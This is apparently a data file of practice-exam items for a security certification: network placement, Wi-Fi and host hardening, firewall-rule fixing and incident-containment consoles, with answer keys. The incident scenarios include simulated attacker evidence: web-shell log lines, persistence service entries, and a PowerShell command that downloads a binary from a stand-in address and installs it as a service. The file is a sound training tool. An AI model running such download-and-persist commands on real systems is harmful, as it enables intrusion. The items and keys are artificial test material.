/* Exam PBQs — 5 per exam, presented first. Types: diagram | appanel | hardening | console | fweditor | exhibit | hashid | fwrule | risk.
   Mix rule (dev/specs/secplus.md): every exam carries ≥1 console + ≥1 fweditor (manifest exam.pbqMust; validator enforces).
   Generated types (hashid/fwrule/risk) make a fresh problem every attempt; never two of the same generated type in one exam.
   console / fweditor items are proved by dev/tests/secplus-exam-pbqs.test.mjs (blank 0, solution 1, one mistake in between). */
export const EXAM_PBQS = {
a: [
 {id:"pa1",obj:"3.2",d:3,cat:"netsec",type:"diagram",title:"Hospital network: place the security devices",
  prompt:"Drag each device from the palette onto the slot whose job it performs. Not every device is used.",
  task:["Slot A separates the Internet from every hospital zone.","Slot B watches a mirrored copy of clinical-VLAN traffic; it must never be able to interrupt an infusion pump or monitor.","Slot C protects the public patient portal from injection and scripting attacks at the HTTP layer.","Slot D is the hardened host that imaging-vendor engineers must log in to before they can reach the PACS servers."],
  nodes:[{id:"inet",label:"Internet",x:52,y:150,k:"cloud"},{id:"core",label:"Core switch",x:240,y:150,k:"sw"},{id:"dmz",label:"DMZ",x:360,y:90,k:"zone",w:224,h:130},{id:"portal",label:"patient-portal",x:420,y:70,k:"srv",w:92},{id:"clin",label:"Clinical VLAN",x:360,y:240,k:"zone",w:224,h:100},{id:"pumps",label:"Infusion pumps",x:310,y:245,k:"pc",w:92},{id:"pacs",label:"PACS servers",x:420,y:245,k:"srv",w:88}],
  links:[["inet","A"],["A","core"],["core","C"],["C","portal"],["core","D"],["D","pacs"],["core","pumps"],["core","B"]],
  slots:[{id:"A",label:"A · Edge",x:144,y:150,want:["firewall","ngfw"]},
         {id:"B",label:"B · mirror copy",x:144,y:245,want:"ids",why:"Out of band on a SPAN/mirror feed means passive: detect and alert only. Clinical devices cannot tolerate an inline device dropping their traffic."},
         {id:"C",label:"C · portal HTTP",x:318,y:70,want:"waf"},
         {id:"D",label:"D · vendor hop",x:318,y:136,want:["jump","bastion"],why:"A jump box is the single, logged, MFA-protected entry point for third-party administration."}],
  palette:["firewall","ids","ips","waf","jump","vpn","proxy","lb"],
  why:"Firewall at the edge, IDS (passive) on the mirror port where availability matters most, WAF for the web app, jump box for vendor access. IPS vs IDS is decided by whether the slot is inline."},
 {id:"pa2",obj:"4.1",d:4,cat:"harden",type:"appanel",title:"School district: configure the student SSID",
  prompt:"Set the fields the ticket names and nothing else.",device:"AP-HS-LIB-02",deviceSub:"Student wireless profile",
  task:["SSID District-Students on both bands.","Every Chromebook carries a device certificate from the district CA; students must authenticate with that certificate, not a password.","Use the strongest security mode that supports per-device authentication; RADIUS server 10.20.0.15, port 1812, shared secret Lib3rty-Owl-4471.","Students must not be able to reach one another's devices over the wireless network."],
  start:{ssid:"District-Students",hidden:false,band:"2.4 + 5 GHz",mode:"WPA2-Personal",psk:"students2024",eap:"PEAP (MSCHAPv2)",radiusHost:"",radiusPort:"1645",radiusSecret:"",pmf:"Required",wps:false,macFilter:"Off",isolation:false,mgmtWifi:false,adminDefault:"Changed to a unique strong password"},
  want:{mode:["WPA3-Enterprise","WPA3-Enterprise 192-bit"],eap:"EAP-TLS",radiusHost:"10.20.0.15",radiusPort:"1812",radiusSecret:"Lib3rty-Owl-4471",isolation:true},
  fieldWhy:{eap:"Certificate on the client = EAP-TLS. PEAP/EAP-TTLS carry a password inside the TLS tunnel.",isolation:"Client isolation stops peer-to-peer traffic on the SSID, so one infected Chromebook cannot scan the rest."},
  why:"Device certificates → EAP-TLS over WPA3-Enterprise with RADIUS. Client isolation for untrusted peers. A shared passphrase would mean one leaked password for the whole district."},
 {id:"pa3",obj:"3.2",d:3,cat:"netsec",type:"fweditor",title:"Hospital: fix the internal segmentation firewall",
  prompt:"A contractor left the hospital's internal firewall half-built. Edit, add, delete and reorder rules until the table enforces the segmentation policy. Rules are evaluated top-down.",
  tasks:["Guest Wi-Fi (10.40.90.0/24) may browse the internet on TCP 80 and TCP 443 and must reach nothing inside the hospital (10.40.0.0/16).","Staff workstations (10.40.20.0/24) may reach the EHR server (10.40.30.10) on TCP 443 and nothing else on the Server VLAN.","The clinical device VLAN (10.40.10.0/24) may reach only the pump management server (10.40.30.30), on TCP 8443.","The imaging vendor's jump box (10.40.50.5) may reach the PACS server (10.40.30.20) on TCP 22 only.","Everything not listed is denied, including any connection into the clinical device VLAN."],
  nets:[{v:"any",l:"Any"},{v:"10.40.0.0/16",l:"Hospital internal"},{v:"10.40.10.0/24",l:"Clinical device VLAN"},{v:"10.40.20.0/24",l:"Staff workstations"},{v:"10.40.30.0/24",l:"Server VLAN"},{v:"10.40.30.10",l:"EHR server"},{v:"10.40.30.20",l:"PACS server"},{v:"10.40.30.30",l:"Pump management server"},{v:"10.40.50.5",l:"Vendor jump box"},{v:"10.40.90.0/24",l:"Guest Wi-Fi"}],
  ports:["any","22","80","443","3389","8443"],
  maxRules:10,
  rules:[
   {act:"allow",src:"10.40.90.0/24",dst:"any",port:"any",proto:"any"},
   {act:"deny",src:"10.40.90.0/24",dst:"10.40.0.0/16",port:"any",proto:"any"},
   {act:"allow",src:"10.40.20.0/24",dst:"10.40.30.0/24",port:"any",proto:"any"},
   {act:"allow",src:"10.40.10.0/24",dst:"10.40.30.30",port:"8443",proto:"tcp"},
  ],
  packets:[
   {src:"10.40.90.33",dst:"198.51.100.20",port:443,proto:"tcp",want:"allow",note:"guests may browse the web over HTTPS"},
   {src:"10.40.90.33",dst:"198.51.100.20",port:80,proto:"tcp",want:"allow",note:"guests may browse the web over HTTP"},
   {src:"10.40.90.33",dst:"198.51.100.20",port:22,proto:"tcp",want:"deny",note:"guests get web only; an any/any guest rule is broader than the policy"},
   {src:"10.40.90.33",dst:"10.40.30.10",port:443,proto:"tcp",want:"deny",note:"the guest-to-internal deny must sit ABOVE the guest web allow, or HTTPS to the EHR gets through"},
   {src:"10.40.90.33",dst:"10.40.10.21",port:8443,proto:"tcp",want:"deny",note:"guests must never reach clinical devices"},
   {src:"10.40.20.15",dst:"10.40.30.10",port:443,proto:"tcp",want:"allow",note:"staff to the EHR over HTTPS"},
   {src:"10.40.20.15",dst:"10.40.30.20",port:22,proto:"tcp",want:"deny",note:"staff reach the EHR only, not the whole Server VLAN"},
   {src:"10.40.20.15",dst:"10.40.30.30",port:8443,proto:"tcp",want:"deny",note:"the pump management server is for the clinical VLAN only"},
   {src:"10.40.10.21",dst:"10.40.30.30",port:8443,proto:"tcp",want:"allow",note:"infusion pumps report to their management server"},
   {src:"10.40.10.21",dst:"10.40.30.10",port:443,proto:"tcp",want:"deny",note:"clinical devices get one destination and one port"},
   {src:"10.40.50.5",dst:"10.40.30.20",port:22,proto:"tcp",want:"allow",note:"vendor engineers reach PACS through the jump box"},
   {src:"10.40.50.5",dst:"10.40.30.10",port:22,proto:"tcp",want:"deny",note:"the vendor path is PACS only"},
   {src:"10.40.20.15",dst:"10.40.10.21",port:8443,proto:"tcp",want:"deny",note:"nothing initiates into the clinical device VLAN"},
  ],
  why:"Segmentation is narrow allows plus denies placed ABOVE any broader allow they must override: the guest-to-internal deny only works if it is evaluated before the guest web allow. Clinical devices get one destination and one port, vendor access goes through the jump box, and staff reach the EHR on HTTPS rather than the whole Server VLAN."},
 {id:"pa4",obj:"4.8",d:4,cat:"ir",type:"console",title:"Incident console: school district student-records breach",
  prompt:"Threat intel matched outbound traffic from the school district's student information system (SIS) server and a registrar's workstation. You have a shell on both. Contain the incident; enrollment and transcript printing must stay up.",
  tasks:["On each host, find the service that matches the IoC list. Compare listening ports and remote addresses; names alone prove nothing.","Stop each malicious service AND disable it so it does not return at boot.","Block every IoC address on the host that connects to it.","Apache, MariaDB and SSH on sis01 and the print spooler on REG-PC04 must keep running.","The district runs its own backup and transcript-print agents that talk only to district (10.20.x.x) addresses; they must keep running too."],
  iocs:{ports:[9001,5555],procs:[],ips:["198.51.100.61","203.0.113.88"]},
  requireDisable:true,
  hosts:[
   {id:"sis01",os:"linux",name:"sis01",ip:"10.20.30.15",user:"itadmin",
    services:[
     {name:"apache2",display:"The Apache HTTP Server",proc:"apache2",pid:1102,port:443,proto:"tcp",user:"root",cmd:"/usr/sbin/apache2 -k start",keep:true},
     {name:"mariadb",display:"MariaDB database server",proc:"mariadbd",pid:988,port:3306,proto:"tcp",bind:"127.0.0.1",user:"mysql",cmd:"/usr/sbin/mariadbd",keep:true},
     {name:"ssh",display:"OpenBSD Secure Shell server",proc:"sshd",pid:790,port:22,proto:"tcp",user:"root",cmd:"sshd: /usr/sbin/sshd -D",keep:true},
     {name:"sis-backup",display:"District SIS nightly backup agent",proc:"sis-backupd",pid:1544,port:8400,proto:"tcp",user:"backup",cmd:"/opt/district/backup/sis-backupd --target 10.20.0.40:8400",remote:"10.20.0.40:8400",keep:true},
     {name:"chrony",display:"chrony, an NTP client/server",proc:"chronyd",pid:702,user:"_chrony",cmd:"/usr/sbin/chronyd -F 1"},
     {name:"dbus-sync",display:"D-Bus session sync",proc:"dbus-sync",pid:4412,port:9001,proto:"tcp",bind:"0.0.0.0",user:"www-data",cmd:"/var/www/sis/uploads/.thumbs/dbus-sync -l 9001 -r 198.51.100.61:443",remote:"198.51.100.61:443",cpu:"6.8",bad:true},
    ],
    ufw:[["22/tcp","ALLOW IN","10.20.0.0/16"],["443/tcp","ALLOW IN","Anywhere"],["8400/tcp","ALLOW IN","10.20.0.40"]],
    files:{
     "/var/log/apache2/access.log":"198.51.100.61 - - [09/Sep/2026:01:12:40 -0400] \"POST /sis/uploads/profile.php HTTP/1.1\" 200 512\n198.51.100.61 - - [09/Sep/2026:01:12:44 -0400] \"POST /sis/uploads/.thumbs/img.php?c=id HTTP/1.1\" 200 61\n198.51.100.61 - - [09/Sep/2026:01:13:02 -0400] \"POST /sis/uploads/.thumbs/img.php?c=fetch HTTP/1.1\" 200 0\n10.20.40.24 - - [09/Sep/2026:08:01:15 -0400] \"GET /sis/registrar/transcripts HTTP/1.1\" 200 18233",
     "/var/log/syslog":"Sep  9 01:13:18 sis01 sudo: www-data : TTY=unknown ; PWD=/var/www/sis/uploads/.thumbs ; USER=root ; COMMAND=/usr/bin/cp dbus-sync.service /etc/systemd/system/\nSep  9 01:13:20 sis01 systemd[1]: Started D-Bus session sync.\nSep  9 01:13:21 sis01 dbus-sync[4412]: listening on 0.0.0.0:9001, relay 198.51.100.61:443\nSep  9 02:00:01 sis01 sis-backupd[1544]: nightly dump sent to 10.20.0.40:8400 (2.1 GB)",
     "/etc/systemd/system/dbus-sync.service":"[Unit]\nDescription=D-Bus session sync\nAfter=network.target\n\n[Service]\nUser=www-data\nExecStart=/var/www/sis/uploads/.thumbs/dbus-sync -l 9001 -r 198.51.100.61:443\nRestart=always\n\n[Install]\nWantedBy=multi-user.target",
    }},
   {id:"reg-pc04",os:"windows",name:"REG-PC04",ip:"10.20.40.24",user:"j.okafor",domain:"DISTRICT",
    services:[
     {name:"Spooler",display:"Print Spooler",proc:"spoolsv.exe",pid:1840,keep:true,mem:11020},
     {name:"TranscriptPrint",display:"SIS Transcript Print Bridge",proc:"tprintbridge.exe",pid:2290,port:9101,proto:"tcp",cmd:"C:\\Program Files\\District\\TranscriptPrint\\tprintbridge.exe --sis 10.20.30.15:443",remote:"10.20.30.15:443",keep:true,mem:20480},
     {name:"W32Time",display:"Windows Time",proc:"svchost.exe",pid:1376,mem:4180},
     {name:"WinHttpProxySync",display:"WinHTTP Proxy Sync",proc:"wphsync.exe",pid:6630,port:5555,proto:"tcp",cmd:"C:\\Users\\j.okafor\\AppData\\Roaming\\WinHttp\\wphsync.exe -k",remote:"203.0.113.88:8443",mem:35120,bad:true},
    ],
    files:{
     "C:\\Temp\\install.log":"09/09/2026 07:42:10 wscript: financial_aid_update.js opened by j.okafor from Downloads\n09/09/2026 07:42:12 dropped wphsync.exe to C:\\Users\\j.okafor\\AppData\\Roaming\\WinHttp\n09/09/2026 07:42:13 sc create WinHttpProxySync binPath= \"C:\\Users\\j.okafor\\AppData\\Roaming\\WinHttp\\wphsync.exe -k\" start= auto\n09/09/2026 07:42:15 callback 203.0.113.88:8443 ok",
    }},
  ],
  why:"Names prove nothing: dbus-sync and WinHttpProxySync sound like system components, while sis-backupd and tprintbridge.exe look odd. The listening ports (9001, 5555), the remote addresses on the threat feed and the binary paths (a web uploads folder, a user's AppData) identify the malicious services; the agents that talk only to district addresses are the district's own. Stop AND disable so the unit file or auto-start entry cannot revive them, then block each IoC address on the host that talks to it."},
 {id:"pa5",obj:"4.1",d:4,cat:"harden",type:"hardening",title:"Software company: harden the build server",
  prompt:"Reduce the attack surface of the CI server without stopping the builds.",host:{name:"ci-build-01",os:"Ubuntu Server 22.04",role:"Runs the CI controller on TCP 8080 for the engineering network (10.30.0.0/16); builds run in local containers; engineers SSH in with keys"},
  task:["Builds and the CI web console must keep working for the engineering network, and only for it.","Engineers already use SSH keys; passwords must no longer be accepted over SSH, and root may not log in directly.","Remove the cleartext services, the anonymous CI access and the default admin credential the audit flagged.","Turn on the host firewall with default-deny inbound and automatic security updates."],
  groups:[{id:"svc",label:"Services"},{id:"net",label:"Network access"},{id:"acct",label:"Accounts & SSH"},{id:"base",label:"Baseline"}],
  controls:[
   {id:"ci",g:"svc",l:"CI controller service",t:"toggle",on:"Running",off:"Stopped",start:true,crit:true},
   {id:"docker",g:"svc",l:"Container runtime (builds)",t:"toggle",on:"Running",off:"Stopped",start:true,crit:true,why:"Builds run in containers."},
   {id:"ftp",g:"svc",l:"vsftpd (artifact drop, cleartext)",t:"toggle",on:"Running",off:"Stopped",start:true,want:false},
   {id:"telnet",g:"svc",l:"telnetd",t:"toggle",on:"Running",off:"Stopped",start:true,want:false},
   {id:"p8080",g:"net",l:"TCP 8080 (CI console) allowed from",t:"select",o:["Any","Engineering 10.30.0.0/16 only","Closed"],start:"Any",want:"Engineering 10.30.0.0/16 only"},
   {id:"fw",g:"net",l:"Host firewall (ufw)",t:"toggle",on:"Enabled",off:"Disabled",start:false,want:true},
   {id:"fwpol",g:"net",l:"Default inbound policy",t:"select",o:["Allow all","Deny all except allowed rules"],start:"Allow all",want:"Deny all except allowed rules"},
   {id:"anon",g:"acct",l:"Anonymous read access to the CI console",t:"toggle",on:"Allowed",off:"Disabled",start:true,want:false,why:"Build logs leak secrets, hostnames and dependency versions."},
   {id:"ciadmin",g:"acct",l:"CI admin credential",t:"select",o:["Default (admin / admin)","Unique strong password + MFA"],start:"Default (admin / admin)",want:"Unique strong password + MFA"},
   {id:"sshauth",g:"acct",l:"SSH authentication",t:"select",o:["Password or key","Key only"],start:"Password or key",want:"Key only",why:"Keys cannot be guessed or sprayed; password auth is what botnets hammer."},
   {id:"rootssh",g:"acct",l:"PermitRootLogin",t:"toggle",on:"Yes",off:"No",start:true,want:false},
   {id:"sshd",g:"acct",l:"sshd",t:"toggle",on:"Running",off:"Stopped",start:true,crit:true,why:"Engineers need SSH."},
   {id:"upd",g:"base",l:"Unattended security updates",t:"toggle",start:false,want:true},
   {id:"fde",g:"base",l:"Full-disk encryption",t:"toggle",start:false,why:"Not part of this ticket."}
  ],
  why:"Same pattern every time: keep the business function (CI, containers, SSH), scope what it listens to (engineering network only), kill cleartext services and anonymous/default access, strengthen the admin path (keys only, no root), baseline controls on (firewall default-deny, auto-patch)."}
],
b: [
 {id:"pb1",obj:"4.1",d:4,cat:"harden",type:"appanel",title:"Trading floor: configure the high-security SSID",
  prompt:"The traders' wireless profile must meet the bank's top tier. Change only what the standard requires.",device:"AP-TRD-11",deviceSub:"Trading floor wireless profile",
  task:["SSID TradeFloor on 5 GHz only.","Use the highest-assurance Enterprise mode the standard names: the 192-bit suite.","Traders' laptops hold certificates from the bank's PKI; authenticate with those certificates.","The RADIUS server (172.16.40.5, port 1812) is already configured; keep it. Management frames must be protected on every client."],
  start:{ssid:"TradeFloor",hidden:false,band:"2.4 + 5 GHz",mode:"WPA2-Enterprise",psk:"",eap:"PEAP (MSCHAPv2)",radiusHost:"172.16.40.5",radiusPort:"1812",radiusSecret:"Vault-Cobalt-8835",pmf:"Optional",wps:false,macFilter:"Off",isolation:false,mgmtWifi:false,adminDefault:"Changed to a unique strong password"},
  want:{band:"5 GHz",mode:"WPA3-Enterprise 192-bit",eap:"EAP-TLS",pmf:"Required"},
  fieldWhy:{mode:"WPA3-Enterprise 192-bit mode mandates the CNSA cipher suite (GCMP-256, 384-bit curves) for high-security environments.",eap:"192-bit mode requires EAP-TLS with suitable certificates; password-based methods are not permitted."},
  why:"Highest tier = WPA3-Enterprise 192-bit + EAP-TLS + PMF required. Fields that were already correct (RADIUS details) stay; fields that were never requested (hidden SSID, MAC filtering) stay too."},
 {id:"pb2",obj:"4.1",d:4,cat:"harden",type:"hardening",title:"Plant OT: harden the engineering workstation",
  prompt:"Bring the PLC programming workstation to the OT baseline without breaking the engineers' work.",host:{name:"ENG-WS-03",os:"Windows 10 LTSC",role:"PLC programming station on the OT network; the vendor's engineering software downloads logic to PLCs; engineers RDP in from the engineering VLAN (10.0.5.0/24)"},
  task:["The PLC programming software and its OT network connection must keep working.","The workstation is dual-homed: remove its path to the office LAN and its wireless radios.","Engineers remote in only from the engineering VLAN. Removable storage is prohibited on OT. Engineers are not local administrators.","Patch only in the monthly outage window; the EDR agent must be running and the disk encrypted. SMBv1 goes."],
  groups:[{id:"net",label:"Network interfaces"},{id:"remote",label:"Remote access"},{id:"acct",label:"Accounts & media"},{id:"base",label:"Baseline"}],
  controls:[
   {id:"otnic",g:"net",l:"OT network adapter (10.0.200.0/24)",t:"toggle",on:"Enabled",off:"Disabled",start:true,crit:true,why:"That is the link to the PLCs."},
   {id:"officenic",g:"net",l:"Office LAN adapter (10.0.10.0/24)",t:"toggle",on:"Enabled",off:"Disabled",start:true,want:false,why:"A dual-homed host is a bridge between the IT and OT networks; attackers pivot across it."},
   {id:"wifi",g:"net",l:"Wi-Fi radio",t:"toggle",start:true,want:false},
   {id:"bt",g:"net",l:"Bluetooth radio",t:"toggle",start:true,want:false},
   {id:"rdp",g:"remote",l:"Remote Desktop allowed from",t:"select",o:["Any","Engineering VLAN 10.0.5.0/24 only","Off"],start:"Any",want:"Engineering VLAN 10.0.5.0/24 only",why:"'Off' locks the engineers out."},
   {id:"ra",g:"remote",l:"Remote Assistance",t:"toggle",start:true,want:false},
   {id:"plcsw",g:"acct",l:"PLC engineering software service",t:"toggle",on:"Running",off:"Stopped",start:true,crit:true},
   {id:"localadmin",g:"acct",l:"Engineers group",t:"select",o:["Local Administrators","Standard users (elevate via PAM)"],start:"Local Administrators",want:"Standard users (elevate via PAM)"},
   {id:"usb",g:"acct",l:"USB mass storage",t:"toggle",on:"Allowed",off:"Blocked",start:true,want:false},
   {id:"patch",g:"base",l:"Windows Update",t:"select",o:["Automatic, reboot when required","Monthly outage window via WSUS","Disabled"],start:"Automatic, reboot when required",want:"Monthly outage window via WSUS",why:"An unscheduled reboot mid-download can corrupt PLC logic."},
   {id:"edr",g:"base",l:"EDR agent",t:"toggle",on:"Running",off:"Stopped",start:false,want:true},
   {id:"fde",g:"base",l:"BitLocker",t:"toggle",start:false,want:true},
   {id:"smb1",g:"base",l:"SMBv1",t:"toggle",on:"Installed",off:"Removed",start:true,want:false},
   {id:"hostfw",g:"base",l:"Host firewall",t:"toggle",start:true,crit:true,why:"It enforces the RDP source restriction; nothing asked you to turn it off."}
  ],
  why:"OT hardening: no dual-homing, no radios, no removable media, least privilege, remote access from one VLAN, patches in the outage window. Availability of the production link is non-negotiable."},
 {id:"pb3",obj:"4.5",d:4,cat:"netsec",type:"fweditor",title:"Plant OT: rebuild the IT/OT boundary firewall",
  prompt:"The firewall between the plant's office network, OT DMZ and control network was edited during an outage and is now wrong. Edit, add, delete and reorder rules until it enforces the policy. Rules are evaluated top-down.",
  tasks:["The office LAN (10.0.10.0/24) may reach only the historian replica in the OT DMZ (10.0.150.10), on TCP 443. It must never reach the control network (10.0.200.0/24) directly.","Office PC 10.0.10.66 is quarantined after a malware alert: deny it everything.","The plant historian (10.0.200.20) pushes data to the replica on TCP 1433. Nothing in the OT DMZ may initiate connections into the control network.","The engineering VLAN (10.0.5.0/24) may reach the control network on TCP 502 (Modbus) and TCP 44818 (EtherNet/IP) only.","Everything not listed is denied."],
  nets:[{v:"any",l:"Any"},{v:"10.0.10.0/24",l:"Office LAN"},{v:"10.0.10.66",l:"Quarantined office PC"},{v:"10.0.5.0/24",l:"Engineering VLAN"},{v:"10.0.150.0/24",l:"OT DMZ"},{v:"10.0.150.10",l:"Historian replica"},{v:"10.0.200.0/24",l:"Control network"},{v:"10.0.200.20",l:"Plant historian"}],
  ports:["any","80","443","502","1433","3389","44818"],
  maxRules:8,
  rules:[
   {act:"allow",src:"10.0.10.0/24",dst:"10.0.150.0/24",port:"any",proto:"any"},
   {act:"deny",src:"10.0.10.66",dst:"any",port:"any",proto:"any"},
   {act:"allow",src:"10.0.150.0/24",dst:"10.0.200.0/24",port:"any",proto:"any"},
   {act:"allow",src:"10.0.5.0/24",dst:"10.0.200.0/24",port:"502",proto:"tcp"},
  ],
  packets:[
   {src:"10.0.10.40",dst:"10.0.150.10",port:443,proto:"tcp",want:"allow",note:"office users read production data from the replica"},
   {src:"10.0.10.40",dst:"10.0.150.10",port:3389,proto:"tcp",want:"deny",note:"the office gets HTTPS to the replica, not remote desktop"},
   {src:"10.0.10.66",dst:"10.0.150.10",port:443,proto:"tcp",want:"deny",note:"the quarantine deny must sit ABOVE the office allow it carves out of"},
   {src:"10.0.10.40",dst:"10.0.200.20",port:1433,proto:"tcp",want:"deny",note:"no direct path from IT into the control network"},
   {src:"10.0.200.20",dst:"10.0.150.10",port:1433,proto:"tcp",want:"allow",note:"the historian pushes outward to the replica"},
   {src:"10.0.150.10",dst:"10.0.200.20",port:1433,proto:"tcp",want:"deny",note:"data flows out of OT; the DMZ never initiates inward"},
   {src:"10.0.150.10",dst:"10.0.200.50",port:502,proto:"tcp",want:"deny",note:"a compromised replica must not be able to speak Modbus to a PLC"},
   {src:"10.0.5.33",dst:"10.0.200.50",port:502,proto:"tcp",want:"allow",note:"engineering workstation programs a PLC over Modbus"},
   {src:"10.0.5.33",dst:"10.0.200.50",port:44818,proto:"tcp",want:"allow",note:"EtherNet/IP was granted as well"},
   {src:"10.0.5.33",dst:"10.0.200.50",port:80,proto:"tcp",want:"deny",note:"only the two industrial protocols, not the PLC's web page"},
   {src:"10.0.10.40",dst:"10.0.200.50",port:502,proto:"tcp",want:"deny",note:"office hosts never speak Modbus"},
  ],
  why:"Purdue-style IT/OT separation: office users touch a replica in the OT DMZ, never the PLCs; data flows outward from the historian to the replica, not inward; only the engineering VLAN speaks the industrial protocols to the control network. A single-host quarantine is a deny that must precede the subnet allow it overrides."},
 {id:"pb4",obj:"2.4",d:2,cat:"attacks",type:"console",title:"Incident console: cloud startup container host turned proxy node",
  prompt:"The startup's cloud bill spiked on outbound traffic and threat intel flagged two addresses its hosts talk to. You have a shell on the container host and on the Windows jump box. Stop the malicious activity without taking the product API down.",
  tasks:["Compare each host's listening ports and established connections with the IoC list to find the malicious service.","Stop the malicious service on each host.","Block each IoC address on EVERY host that has a connection to it. Check netstat on both hosts.","The API gateway, the container runtime, SSH and Remote Desktop must keep running, and so must the startup's own metrics and secrets agents (they talk to internal 172.16.9.x collectors)."],
  iocs:{ports:[1080,6667],procs:[],ips:["192.0.2.150","203.0.113.200"]},
  hosts:[
   {id:"ctr-node2",os:"linux",name:"ctr-node2",ip:"172.16.8.21",user:"ops",
    services:[
     {name:"containerd",display:"containerd container runtime",proc:"containerd",pid:705,user:"root",cmd:"/usr/bin/containerd",keep:true},
     {name:"api-gateway",display:"Product API gateway",proc:"gateway",pid:1460,port:8443,proto:"tcp",user:"api",cmd:"/srv/api/gateway --listen :8443",keep:true},
     {name:"ssh",display:"OpenBSD Secure Shell server",proc:"sshd",pid:812,port:22,proto:"tcp",user:"root",cmd:"sshd: /usr/sbin/sshd -D",keep:true},
     {name:"metrics-agent",display:"Metrics shipper",proc:"metricsd",pid:1588,user:"metrics",cmd:"/opt/metrics/metricsd --collector 172.16.9.10:4317",remote:"172.16.9.10:4317",cpu:"4.1",keep:true},
     {name:"unattended-upgrades",display:"Unattended Upgrades Shutdown",proc:"unattended-upgr",pid:744,user:"root",cmd:"/usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown"},
     {name:"netsvc-proxy",display:"Network service proxy",proc:"nsproxy",pid:5021,port:1080,proto:"tcp",bind:"0.0.0.0",user:"root",cmd:"/var/tmp/.X11-unix/nsproxy -socks 0.0.0.0:1080 -c2 192.0.2.150:443",remote:"192.0.2.150:443",cpu:"21.7",bad:true},
    ],
    ufw:[["22/tcp","ALLOW IN","172.16.8.5"],["8443/tcp","ALLOW IN","Anywhere"],["1080/tcp","ALLOW IN","Anywhere"]],
    files:{
     "/var/log/syslog":"Sep 21 03:10:44 ctr-node2 containerd[705]: container 9f2c created with host mount / -> /host (requested via unauthenticated API on 0.0.0.0:2375)\nSep 21 03:10:50 ctr-node2 ufw: rule added: 1080/tcp ALLOW IN Anywhere\nSep 21 03:10:51 ctr-node2 systemd[1]: Started Network service proxy.\nSep 21 03:10:52 ctr-node2 nsproxy[5021]: socks5 listening 0.0.0.0:1080; registered with 192.0.2.150:443\nSep 21 03:15:00 ctr-node2 metricsd[1588]: shipped 1840 points to 172.16.9.10:4317",
     "/etc/systemd/system/netsvc-proxy.service":"[Unit]\nDescription=Network service proxy\n\n[Service]\nExecStart=/var/tmp/.X11-unix/nsproxy -socks 0.0.0.0:1080 -c2 192.0.2.150:443\nRestart=always\n\n[Install]\nWantedBy=multi-user.target",
    }},
   {id:"jump01",os:"windows",name:"JUMP01",ip:"172.16.8.5",user:"ops-admin",domain:"CORP",
    services:[
     {name:"TermService",display:"Remote Desktop Services",proc:"svchost.exe",pid:1096,port:3389,proto:"tcp",keep:true,mem:9900},
     {name:"SecretsBroker",display:"Secrets broker agent",proc:"secrets-agent.exe",pid:2410,cmd:"C:\\Program Files\\Ops\\secrets-agent.exe --broker 172.16.9.30:8200",remote:"172.16.9.30:8200",keep:true,mem:18800},
     {name:"Spooler",display:"Print Spooler",proc:"spoolsv.exe",pid:1792,mem:10600},
     {name:"WinNetMon",display:"Windows Network Monitor Helper",proc:"netmonhlp.exe",pid:6188,cmd:"C:\\Windows\\Temp\\netmonhlp.exe /irc",remote:"203.0.113.200:6667",mem:14200,bad:true},
    ],
    conns:[{proto:"tcp",local:"172.16.8.5:50211",remote:"192.0.2.150:443",state:"CLOSE_WAIT",pid:7712,proc:"powershell.exe"}],
    files:{
     "C:\\Temp\\ps-transcript.txt":"PS C:\\> Invoke-WebRequest https://192.0.2.150/n.bin -OutFile C:\\Windows\\Temp\\netmonhlp.exe\nPS C:\\> sc.exe create WinNetMon binPath= C:\\Windows\\Temp\\netmonhlp.exe start= auto\nPS C:\\> Start-Service WinNetMon",
    }},
  ],
  why:"The indicators are behavioral: an unexpected SOCKS listener on 1080 open to everyone, a binary running from /var/tmp, an IRC-port (6667) connection from a service in C:\\Windows\\Temp, and a PowerShell download from the same address the proxy registers with. The metrics and secrets agents hold constant outbound sessions too, but to internal 172.16.9.x collectors. Because the jump box also touched 192.0.2.150, that address has to be blocked on both hosts."},
 {id:"pb5",obj:"5.2",type:"risk",d:5,cat:"gov",title:"Risk math: SLE, ALE, cost-benefit",prompt:"Compute the loss figures and decide whether the control is worth buying.",task:["SLE = asset value × exposure factor.","ALE = SLE × ARO (events per year).","The control is justified when the ALE it removes exceeds its annual cost. The calculator is in this pane."]}
],
c: [
 {id:"pc1",obj:"4.1",d:4,cat:"harden",type:"hardening",title:"MSP: harden a client's file server",
  prompt:"Apply the MSP's server baseline to the client's file server. Users must still reach their shares.",host:{name:"CLI-FS01",os:"Windows Server 2019",role:"File server for 40 staff over SMB; managed by the MSP through its RMM agent and RDP from the MSP management VPN (10.99.0.0/24)"},
  task:["Staff must keep reaching their shares; the MSP must keep its RMM agent and its RDP path from the management VPN.","Remove the unused FTP role, the Guest account, SMBv1 and the two name-resolution protocols that enable credential relay (LLMNR, NetBIOS over TCP/IP).","Shares must not grant Everyone full control. Forward security logs to the MSP SIEM.","Updates must install automatically and the host firewall must be on."],
  groups:[{id:"svc",label:"Roles & services"},{id:"net",label:"Network access"},{id:"acct",label:"Accounts & permissions"},{id:"base",label:"Baseline & logging"}],
  controls:[
   {id:"smb",g:"svc",l:"File sharing (SMBv3)",t:"toggle",on:"Running",off:"Stopped",start:true,crit:true},
   {id:"smb1",g:"svc",l:"SMBv1",t:"toggle",on:"Installed",off:"Removed",start:true,want:false},
   {id:"ftp",g:"svc",l:"FTP server role",t:"toggle",on:"Installed",off:"Removed",start:true,want:false},
   {id:"rmm",g:"svc",l:"MSP RMM agent",t:"toggle",on:"Running",off:"Stopped",start:true,crit:true,why:"That is how the MSP manages the box."},
   {id:"llmnr",g:"net",l:"LLMNR",t:"toggle",start:true,want:false,why:"LLMNR/NBT-NS poisoning captures NTLM hashes for relay or cracking."},
   {id:"nbt",g:"net",l:"NetBIOS over TCP/IP",t:"toggle",start:true,want:false},
   {id:"rdp",g:"net",l:"Remote Desktop allowed from",t:"select",o:["Any","MSP management VPN 10.99.0.0/24 only","Off"],start:"Any",want:"MSP management VPN 10.99.0.0/24 only"},
   {id:"fw",g:"net",l:"Windows Defender Firewall",t:"toggle",start:false,want:true},
   {id:"guest",g:"acct",l:"Guest account",t:"toggle",on:"Enabled",off:"Disabled",start:true,want:false},
   {id:"shareperm",g:"acct",l:"Share permissions",t:"select",o:["Everyone: Full Control","Authenticated Users: least privilege by group"],start:"Everyone: Full Control",want:"Authenticated Users: least privilege by group"},
